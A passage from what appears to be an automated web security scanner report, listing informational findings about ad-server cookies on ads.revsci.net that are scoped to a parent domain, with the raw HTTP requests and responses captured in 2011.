+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_0QhP="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"; rsi_us_1000000="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"; rsi_segs_1000000=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; rtc_M6m_=MLvntzM1ZwprJ5GrFviWjmmgATvNNHGJjojTTrWSZIpIFNkYyjZfNBHlcl0kJ6zHfageWylXbP3wSCPbUS6YYjcsKmrQeOUqyKPcaGszTDTzIh7WtzP5n4+zmZZfmgT5lRj+VfPH65chCW295PBHTclwaYvz/SFH1bidheEC6ZRKt9SG9BW8wwNKY4bJJbonQFHtMUTJpFcuSZbz7kTJnxMUL5KgBaHzjRvnrX6SnFrrchfIM5yjshfapwcb2sNQzbZdjBfasru/cAyP1weNriyPKHNATEhqm48Frl0iQ58XID97HW4ZuelkytTr1rC/Y44WWirvX1n4YT+DONi0LYUryUMomW7rJigm4wWq4rIRbkjgSHhZCCWRyQUFwJAV1ID5hI+aJ6aazd6dtbfN39bi3YdtOqXFXtQA1oZ823p8bU8+95SiLREbVMj4r9fvguEqsb6ZiowiD0QHBR5O7YoGrQTtvt49OFBNALY6xCbDvCZRxcd3PwMbMHF9NmAkKTYba8V7HuVRswXCU8FcQcP/VnsVvebZKb0EM1g01x05ERxj/PWvJb23XMUlVENuV3UxjP7/ReTP933hW1beZhIpumclGw06TmVZf/liRMOjCGGidIRNLkCjxr+jn98gJ60DuWa/6oljSYreAox5hf34+wFu4UMrGRoDMmJA7LZ+pzg7HZsRUu2MzWjCkj/8ilLGHSmlL5arTBlslp16GZkGUbdCuQOVlFSnlI9osJ7qHROvOJZhg2kYof7dNriymTDR4d+g5uaoD9DKAtFuCds/Rc7xVtfeQw4QMbnaY4JllnOKqLPOynBZckcstz/Rie4b4P4ftC2ihuu+hh+tb4xtHsHXUPc4S4kcgMoYU6nDhAG17oc8hRuW5vnXQ8mjCFlmg1AikueTXuw9zaFzxcX2n/5AY6b/9CvUk2jTwvfrs1Zd70/ybVtROyX11nYzYcRFBDcu6y63yS0FvWxXhj23zJyQBUyORdmr8TZe9HKLARFqrE0WgqHy3o4bQOGiuinjnlQO6/Tb6EQqtbqScAcGbOoTuOrGyyrrkhQRvhGP5TddNjuCbLxdI6ExyfhSWnMD5gI9RRANVnvfKpeszlgkjMhHO+AI0RAg1Rnrb694FmmSVopIgyGRfYWjkynQNgJu2WFcRVxyqXdKIg1ngWoCjEvDaqGOV5o+mwsP0WqnIOmypaPth6VviROUBdBqnTYbQpKrGdRSH3Wfsh+/t6tYtduD74mjx0Xqm2pq
08w5QcKeM1WKgDKkMJ+XdzqfOAnZd82pKBjE4ORwnukNbnOu7MSSwsL9SL6E1m6fnHLOzNMuGy01wnCq/XskooIWiGeIa++XVGFfQXf7PDHd/Ucx2loESlP3R+oaCchKLj4LZFp4NtIXHvyjIXyP99iHRNx2gZf2aM8ryFP+bp9W3EenSlOtdlCd6kjeE5ZKlRwWat6Qd7j1HhdXSiPKFMAZC/MR350YkTLr27YH04gcO6l0Dkc6qJlOHZIyA2wZYJbumg0oQqkm5O5bX8SVTYKyLJBZj57fPCUUFQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0QhP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0QhP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_KnyU="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 01:13:48 GMT

GIF89a.............!.......,...........D..;

12.14. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_aQJL="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"; 
rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkjytG2HRpKcZ9iWeqPjy9kUWtl6xHCau2KMfgIXcPB8e/BpyfjtTtphAROxiuC83s+lEsRUrjgTlU1Q6ETbocY99WQN8dgTYd2TIldE82taHLaxy+Nydj7bjxqRSEzydoNKcidj8e3cwbw247cKkh0bvF6cW05IwoxL3mn8eGwNjtE8wBzFJ246UcorTvpQmlUzFWkSAdzpSiAiPPsJIE8lbllqVolddNGM9UughUMVmJRRI4QxwiFiwtc6KIkleGTyQORbnreQFdhoy9tIXJDzDUrzQQPFg53TtcFU0IzSRyZT7Ysrwwl1bCknBlQyPjhUJ76l2w0sAMYL8wdNz8+XZcRcYKvvD/UrCKooUt/aj0R6J70YEugNGsaI/NdjyO0otwfzNbegXYLqm4kbsRDLCOaFswANa5kumj+Myz7WFxFbCzByPlnMLG/iRprYhnnkwcpoUb94vjivtXsRNU8sY+9nJ/GyK0btkNncXgdCWK6F6Oq130DYl7qVO7toWR/7nBkQRQIHLYme9RaVkdGxQWzXlbDG+28P2rHEEKz1Jjq3MinipUFDb/X+skn0RAc5T2sv30M4M6SF5um2GeWtPGlm5/Kb7BBThW/rN4hbbJoIkTzsbd8cjyEyF0/6eY8Ql2WYO/ugwtD3KZKjg5FVoYYefZZL5FOyh5daP5P/acL+xvjHz+q/GKm+7UEbKgyi9riSc6BmVdwLpaoKChjgmndfydm9Rp55qJhAVzniaZx4ZfHgIJVo9ZqKvelViCz7jBcU+V22aO+QATsHM3O7khIxKxUpkTaNd2kuV2SDDKynS7pV755LqyKqSMIL9wDkqmG7I+PrM991cy7UOrI9CvhRsR0dGASBwDlIzEsz74PHZLjOOmhUndtuC+D9t3Pq9su4Qx5Gs+t+I1W2txXTMTAcv2+R94m2kL+BDy7SPgGZGE0LncHJN7qYordxYyuPDkLDO+RTaY+dG9ss66V7iVeW1Vpey8S0+SwK+SzonThNqM/B2m/bV6ZSXYt/prvJB/MoIZP7SVL30KjWZ5/nCFvqlj310LdQdx0sQ7a5cozfA89Wdmx6jAkGQrp47QDxo74bzIxU7oFU3eB48wpYTTqzPon/N/QOCsyy2tlb0vJptzVJDknJSV4Q5JHz84YjU8xY+F+7133qycHPNZitpdKfZe0t1RvmPf+XiCaa8BsDly/gBuN8TvoXnO8CAEwaesRAiFwcVqRagT7jCCmYzHi3EpHSIU6iFVXHlFHEhbdShbrC6g1B1Dr34GmQRkEjan4C1Evhax4yYJfFg/As+UsUZxBW0pXt5DzJCs/6I4Jli5U0q36mqAAXwqUxTeVjFtUsmZcR5liY8B3SY9pZ48EVHSp+luF/CLoxOj2+gMyXe3zIStYnrdo0U="; rsi_segs_1000000=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; rtc_0s-X=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

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_aQJL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_aQJL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3uZd="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=596291&id=1044587&id=1049772&id=1063911&id=1063910&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:02:36 GMT


12.15. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=4298BE5B089CBB1E55E7A69A4E062327&rsi_site=BCE6C348CDB3347A37A6E9503B9F4896&rsi_event=3E8A9FCC69C70348C54F8308F5EEBF2B HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_VOiH=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; 
rsiPus_0QhP="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8agCQaitfp6FA0C8r6hsCwn3LMq6VYMHBegA/Z8Ad/QVjxQ2jNsY0ZWD+qEDxiaWPrTwV87vSfczY/tW5l+pH2v6yDAOuX7qLwExVNaXzP2AMt2j6L/eVkJaL8Z3clgZfjZQfsz2Izvu3lvroVB5Qkq5knhep0fRnij2U5Rhz/Vq0pNRMfJgqDntQNUxuwMuKPi/MV/+D5eTiviMqUVLFajotuW5yMfx/XCoKPsB5uFmJ0aEeYdxcSsloefxMiWADTneb8JcFvWYtzJV7goOlW2IZx/Qe7uHD+WE8DohrAg/IzlnQvpZUk/4nt3G7S1d2+FlWbhTTptTyrmqrUJmLu9d0aNbocdAj+G6puSgbaITB3GNtmbmWvWWYkjJUdAu8bWyz1Vxk9EtoZWN3fQ4moqyebnLZSCFznuaZy3XM1MZ/6UPGDGHg0wxwW93Ub4rBq2yDHcsfYbVyvGXzLw+8b+9UUy9zqBvbciwPhJtnEN2oJ+DSWNdng4kQV2z3lppmGNciKPNvEKlkFUGDPVMAtT9lm7UtaNWxCHXgjOtDbRm+CiahJd7NZgrCqRLfB5y//J0Ufw2gwej267ae86TAzxXu2eN6qgF8dcgK67pb0uoIvBvpTfgwi1pcxvPMCci4Vi8mTRD9tCnSNVAoEbX9LWcwaPN2Q7u7zZIF0oXM2p6RhJVeuJefa0PpIftjz0TCJPHRy7zk/lxwmTTLV3ffe8wrI7wgAyuSZxJ9HAJHIAxBzEkzwZWCcYNelk2KyyMGwsgsHyGpeFNI6jLb9IUyzjd7Cykl5KXX0/7MCFYJZEI97vkjpX7jX+GTSxF6d9Kgn6FEOTsU/uJhGmj59St/BrJxgeq94hjxHaiSpeUeJhZrK/iO6EjtDgbxDO8jw3lV7nyksZqm4f+scdCX8kvHizV60UOU0QXvdGsX83/nBssHBisyFjwXrrxi+1Gcg2/RtGxPxb+aVl2g1cE4B7E+LmhICDn/O5CC+8O5HoLPPyA="; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0QhP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0QhP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jPps="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=987677&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:13:36 GMT


12.16. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=4298BE5B089CBB1E55E7A69A4E062327&rsi_site=BCE6C348CDB3347A37A6E9503B9F4896&rsi_event=3E8A9FCC69C70348C54F8308F5EEBF2B HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_M6m_=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; 
rsiPus_nlnh="MLsXrqMOLjproBAxuuKo7xC/v0lmTlecDqSiToO8phWAnpO+YSTKFqU3TDxxVRk18Y3VCTjL0ah6bV8hWqwKPejoJrdpYW+maSaE+SE+JYHAqw/wQUT1qX7wDv68KC/ogKITsb9dC8gdu0uA7sN+LTYfo6fDEvy97fr0sfCIWg/dl5X5uzDg9KOQN8uVmwRirSVhkHVm0KyQbnTUGsc2ZQvcAhR0xzocc/zo82+gM1RCIH+HSCGErtUUZc9RJCGEmtyJa50VtG6uhU13oDsoWTBcH+pKwA+EFmS5nr9l5tca9Gn0G15id7IFw3BzD4Tvch7eJWmhiUjCLEDfLl0gbdj+ckvbdlfP3VayclAOz29lDjEAIM7evWDsxAp95So743zgvTRtdCe4oiCVigVSbNlYtf2gls9w4/Rbe+tmpqScTnQCnaNQwIizICQvruNgmFH/6+lojkVGlNDz5Ky3rTgx4Lb7FGgQFqtNmVDkIrLBzE5vX3eGdFDbFFVsTp88ZqFbUCErpL3v70oO0vaq8n4dLXBDnlJvcS6JdnjRk9xkIe69ZW1oeNhnpjXeiCaYl4LhoNHPSyKqNQcopy21Lq6Fx65Ehc1L/Zo9a+T+ilMYjIAgks58mh41keirnpuezj6yRhV7JX2rrCEqT/hJNxX7y2JcARkB1nMRRB8Zj9SHmrYZ638tSYG3b90lhgWBLXv0LDarrDfBS1eszRzd+qY471tll+fm92jvMhKTIDlOLkVopd2x+0aEKBYWNNN3k3toyRwrKsE4hBORWYMZSTdPaYPOQ1UPnovWcZpohcny7FCN8FH6hqZu6WJ0bE7KXD9+iEBSpnGNcjuJ57gNCQUER3dnilXxUU035Ub31YKYngAcRd67M4oL+VtrIgTE1ftBWaJU5hTHGEe4Nz2Zci3y3xXI6G85vV5OQZPwMjZ5we4k3N9bf3L5Db5oz9FeCksBpZVkBjxTqBRYGfoO/jdzHDYmpioDH7T49AzUBkFAhbVGacpYyYl5p0wOriiZcw3ZFQoSD4yzLpEu3nFozzx0"; 
rsi_us_1000000="pUMlIz9DOAYU1O2WA3Nf1wgg9Tpj7P+Tw3jzv8rD7yvDmvWDQ0Y8a5KAq8B98fA1QmRNDddtH/dK+uIMHXn850oVpZ6hBQpRqWE9VPS5Xy7XGW2RoRccmRQldIeS8HXSTpZFxGDjrLBA6xGO31q5lEKg7q/Zqa3Eh3raYFPi2iq2P/WUJ8LzKuLWOFTjNfjCk/0VNg4UoWYInFurSNSQ+aUh/C47rdGNAf1Dg1oVK6qn87HdFN4KIp8qp25VM4TSqlPz6cg1zQD2GwFFfzhKwHp0kGxTZK6jX8ZnXISB8sXcy0D55JrXRUETl0uoI4QVbKEZF/5dx1gs9ptsf6SthAIG43IlegqXwtMLrqqpTk/JyFQ2StgdP9FYuRHDpLz+OHzUQh1vrm5xKjX3+Q640exxVIfbO5itfUNxo5BZqgcjww3GikxnYg5fSYMvW08WJalwrMzbnGLl0KXXJ46jOVLE0Rb0yvlFoNktRzKMye9waAvctfzuH9EHwibUfXt190PEJ4A+Sg0AcAp7kOwVeDkiN2MCb3r1WPXuHm3y8pbsO2binEZAAOMbMCz6CtX91Rgn2EzUAx81QjGglnztOuUFRFlI7kjMQeXLGKWBRZdSe6eYTB6Lnh18LdQ5agXYqBlP5eTr0pdews3C7wuHkSy+cjD2XlZOYEMXQn9PuBTSjNA/XlMSRQqc9WomgO0U1VW9Z7NS9+gZx4/DR1GwAkIBjPHU5AlJIaaxmJASLwvjIxrX5KW3zZGf/mjfA2cFyChzAGmctIpu+Vd7ARiWWqAIi6cgvytaV2BRdBlrXFkhSMrlmfawqiVLWJ+RfqZK7gaVrut3WnrJOVMXXqr7CtxUK6a2Pn/1EfyMPFJStSe6uI0JDgJOOUXIh0/QlT3bEiUUzklRDfiLQQg9qZceXx0I0CFus/5FTGi3aSsJ/iOmQ7U7lJyS2obs9TpltQ/ufeib9k1qvREJYFLBR0z5bFhcp5yzXQbaEFx8ymNOXnS1itZUINjWC8jdy5PsuUT+JDJXPtf/HEu1N4a99erdLdqPuj+ki8RVgjGf1QVPdRYQN5Ikpkk0MRA5SSlsc87Euf+syX6f0SaGqcOA+LMY28by9BOfF4CjwojIYLQA7CTMmShGLD7QIoYNPB9pH3S/WcquP8g8yavfDQBU+QwcMOiGx/GukIS2j/H4BDvCbywCrbiyLf0IsbRg+/vZyQlnl03yTrzUhfJGYADGtKLHujYIlWVJ2juevHA9vZrI2f0zNZZFT5Ox5BJBvBcQLenCuVaRyx9ZwQYz5yUzskZStzZiHbYlVsH1sWxuxzg1xSosd3Tq17MFdy1sDZD30OeKip7ei44DiArBocEjjeNpiyKtXSdt7rrwtwl36hGrMTrfhX6+/bn0kr2hGgVBE+oKtf3pVCXZqMHah6gq1RieAs/KWLv+Kc38x5h3OOZj9/KY5a5+y4Drg4l7b9rJsCgZP8zktKSaeNFEIDZ35+CtVymuq0xkEBJifIs="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nlnh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nlnh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5yqb="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9DOAYU1O2Wc/EoGVYZpEdtFa0wkO3LcjYdMedG/503vY5t8QC5qXOSo49tlyo/SaXH5wQBQZoGx8vtub+wYEktHO6BM//uLrdNXC73GW2RoRccmRRxz8iNhj4BKt+Y1QbBr3hgo7XOn3j5NZwUH6cpGC/PhQP2yc3oMfwqw4P2G8L/1MLWiPQkNLjS6Q0ULgZUseZorMWeIlvn6tAf+I16Wc7DPgWwgxsVI+qfMtmvXhiXCCZxxHkTzrS2Qx9wJGinCc3C6IbEK6L+bOM/d0zvNcSiV/bnXGaM0oXMywF54yMGDQbgxlX6KiaXi5cecO3tNy2uyZvsphzHiMKU415xoLFWR5vIUqqtZ3p0I7MdNQAymt+azR1IgoeyLFHonQV/rmbDVyBrQ7w/ZU1q3kPLNZqCoV19V8Ng3RcmgDNs2ztcqJiJ2FYpYHHLExFXt/kMkEKU12WDAShkamQ4oh7wVtvb3SIZvhlglQ4XK1myJJ70E2cGE993JVtFB4ZSDzI5mD1ULHX5ipqiAWCc57KD4ahZqh2uhYR03AikbGwMyjC9INZnFYCGISKHvOyJMMCqXuslvb0LOqdL1CNF73QC3mlmmAsFkg/Z1N0Lcju2xYkR/w04GSY87iblMN4vGedpKxyOty8WBEY5zR3PoeJAPW813IlvGKI+vrtPOnhXkDl5GFfXyOuzVksBDR0aU4odjaj9Ydllfjz9gXcpchwizlcc8yJtNAoSVT5blL4wWQnXBp1X4EqMI7rXbc2BxYFveNmgFDHak3Uv1aahWQUTA37C+/jHID6QBEXvvXL38cgHFdC0+wVBE1/bEJPHD7RgiMULCYDRnuBB7vb4bw8EkraqsFwTCQuECl9FE+xV5gwdL+Zs43PrB8Wbzo32CFjasjNqoLC4uGfrDe3/4eIPomh2R7O0wqTgfeQqm7U7MZWjGEQax9tHfZ9cjVmQ2luC27SJVuBpsVgTENVuoPj9sPHfqlx1OKzRXsxBXVNMuNB8zsGaobxo3NEaQgb7bxzMy2YaItXeP1SshknEbvQGIG4gNeqfOi/f7owgltGCxoApuUOYoQo/GRHlyUtX7dJav8HzMCoSk8O/hBCdS2FWBCkjLh7ZHlOb5iwL5/G417cICEUUFpp0bAIolhPhljmnqXaeGGY4TATTuQd2sr2shKgIr9MeXfVXfK40jfgXLDr0cBPoR5w9pbOynqLgwtjdFtf9K0Tco2eQSbv3Sgx1M83lReyDnC4n4v2FIK8kb1JyDlcPIVSllALhBZa00InWMpvYzctsjkNfujaODeQ7HB4rHCcl3yKE4UR5iHJH6uF4QRvCiaEM7wK91IOM7w2RPnXJnsR3YNyLRd4ZB2HJPpFnqTEi/5U+fnusYeCe5OxMsM54Lrvi9prlub16W1NfBaKhZjCDJtb9MgIIHzFj7bkX2/w7hpvWSvyy5VBHJrbpjHQ76isdLqMJ9Whj7/Rb+y0+VUxwk2q++4qHdrARV+JAkDbTDpleLUYiMgukHEmKgP3o6ijg5npUPykZ+K/RHXzZWBsOQLYEXSb//xDOXa7h7odolJp7vXr+/5s="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=987677&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:15:43 GMT


12.17. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

